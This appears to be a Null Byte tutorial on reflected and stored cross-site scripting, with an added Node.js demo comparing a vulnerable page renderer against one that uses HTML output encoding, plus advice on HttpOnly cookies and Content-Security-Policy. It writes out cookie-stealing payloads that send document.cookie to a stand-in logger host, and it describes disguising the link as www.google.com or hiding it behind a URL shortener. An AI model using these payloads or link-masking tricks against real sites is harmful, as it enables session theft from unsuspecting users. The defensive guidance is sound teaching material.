How Cross-Site Scripting (XSS) Attacks Sneak into Unprotected Websites (Plus: How to Block Them)
In this Null Byte, we will be educating you about XSS attacks and how to defend against them. There are two kinds of XSS exploits: non-persistent (reflected) and persistent (stored).
Non-persistent attacks are very common and usually live in HTTP request parameters, such as the values submitted through HTML forms and website search bars, that the server echoes back into the page without encoding them. Because the payload is carried in the request itself, the attacker has to get the victim to send it: the link is typically spread over a trusted domain or in a private message that points at the vulnerable page with the payload in its query string. Here is an example of what a test for XSS could look like:

<script>alert(document.cookie)</script>

If the web page executes this, an alert pops up in the browser showing your session cookie. What does this mean? The page is vulnerable: it placed our input into the HTML unchanged, and the browser ran it.
We could then alter the attack so that, instead of showing the cookie, it sends the victim's browser to a cookie-logging script on our domain, mask the link in HTML and send it to other users:

<a href="http://www.example.com/index.php?id=<script>document.location='http://www.yourdomain.com/cookiestealer.php?c='+document.cookie</script>">www.google.com</a>

That would appear legitimate to the person being attacked; they see a link to www.google.com, while the href actually carries the script in the id parameter of the vulnerable page (in a real link the payload would be URL-encoded so that it survives the query string). If no HTML is allowed where you post the link, you could always mask it with a URL shortener.
A persistent attack works like the reflected one, except that the payload is saved on the server, for example in a comment, forum post or profile field, and served to everyone who loads that page. Let's take a look at how the payload differs:

<img src=""><script>document.location='http://www.yourdomain.com/cookiestealer.php?c='+document.cookie</script>
Everyone who views this page will have their cookies logged to a remote cookie-logging script.
If you're a web developer, there is no single trick that prevents this, but there is one rule: treat everything that arrived in a request or was read back from the database as untrusted, and encode it for the context it is placed into. HTML-escape text before it goes into the page body, escape it again for attribute values, and never concatenate it into inline JavaScript. Validate input on the way in as well, but the encoding on the way out is what stops the browser from seeing a tag. Two extra layers are worth adding because they limit what a successful injection can do: set session cookies with the HttpOnly flag so document.cookie cannot read them, and deploy a Content-Security-Policy that forbids inline scripts.
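To make the reflected and stored cases above concrete, here is an added example (not code from the original Null Byte post) written for Node.js. It builds the kind of link described in the reflected section, runs the post's two payloads through a deliberately vulnerable page renderer, and then through a hardened one that encodes untrusted values for the HTML context they land in. The function names (renderUnsafe, renderSafe, buildReflectedLink), the example.com target and the sample comment are hypothetical; the payloads are the ones discussed in the post.

```javascript
// Added example, not from the original post. Demonstrates why the post's
// payloads execute when a page concatenates untrusted input into HTML, and
// how context-aware output encoding stops them. All names are hypothetical.

// The reflected test payload from the post.
const TEST_PAYLOAD = "<script>alert(document.cookie)</script>";

// The stored payload from the post: a carrier tag followed by a script that
// sends the victim to an attacker-controlled logger with their cookies.
const STORED_PAYLOAD =
  '<img src=""><script>document.location=' +
  "'http://www.yourdomain.com/cookiestealer.php?c='+document.cookie</script>";

// Builds the link an attacker would send for a reflected attack. The payload
// is URL-encoded so it survives the query string unchanged.
function buildReflectedLink(targetBase, payload) {
  return targetBase + "?q=" + encodeURIComponent(payload);
}

// Recovers the parameter the way a web server would, so the whole round trip
// can be checked offline.
function queryParamFromLink(link) {
  return new URL(link).searchParams.get("q");
}

// Vulnerable renderer: the search term (reflected) and the stored comments
// (persistent) are pasted straight into the HTML, so the browser parses any
// tags they contain as part of the page.
function renderUnsafe(searchTerm, comments) {
  return (
    "<html><body>" +
    "<p>Results for: " + searchTerm + "</p>" +
    '<input name="q" value="' + searchTerm + '">' +
    comments.map((c) => '<div class="comment">' + c + "</div>").join("") +
    "</body></html>"
  );
}

// Encodes a value for HTML text and double-quoted attribute contexts. Once
// these five characters are encoded the browser can neither open a tag nor
// close the attribute the value sits in.
function escapeHtml(value) {
  return String(value)
    .replace(/&/g, "&amp;")
    .replace(/</g, "&lt;")
    .replace(/>/g, "&gt;")
    .replace(/"/g, "&quot;")
    .replace(/'/g, "&#x27;");
}

// Hardened renderer: same template, but every untrusted value is encoded
// before it is inserted. The template structure is fixed by the developer
// and the input can no longer change it.
function renderSafe(searchTerm, comments) {
  const term = escapeHtml(searchTerm);
  return (
    "<html><body>" +
    "<p>Results for: " + term + "</p>" +
    '<input name="q" value="' + term + '">' +
    comments.map((c) => '<div class="comment">' + escapeHtml(c) + "</div>").join("") +
    "</body></html>"
  );
}

// Check: does the rendered page contain a script tag the template itself
// never emits? True means the input reached the browser as markup.
function containsInjectedScript(html) {
  return /<script\b/i.test(html);
}

// Stand-alone demonstration of both cases.
function demo() {
  const link = buildReflectedLink("http://www.example.com/index.php", TEST_PAYLOAD);
  const reflected = queryParamFromLink(link);
  console.log("attacker link:", link);
  console.log("reflected, unsafe render executes script:", containsInjectedScript(renderUnsafe(reflected, [])));
  console.log("reflected, safe render executes script:  ", containsInjectedScript(renderSafe(reflected, [])));
  console.log("stored, unsafe render executes script:   ", containsInjectedScript(renderUnsafe("", [STORED_PAYLOAD])));
  console.log("stored, safe render executes script:     ", containsInjectedScript(renderSafe("", [STORED_PAYLOAD])));
}

demo();
```

Note that escapeHtml is only correct for HTML body text and quoted attribute values; a value that ends up inside a `<script>` block, a URL, or a CSS property needs the encoder for that context instead, which is why the rule is "encode for the context", not "escape once". Pair this with an HttpOnly session cookie: even if an injection slips through, document.cookie returns nothing for that cookie, so the post's cookiestealer.php receives an empty parameter.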
That's all for this Null Byte.
I know this is a hard subject to wrap your head around, so if you're a beginner, keep me and the rest of the crew entertained with your questions in IRC!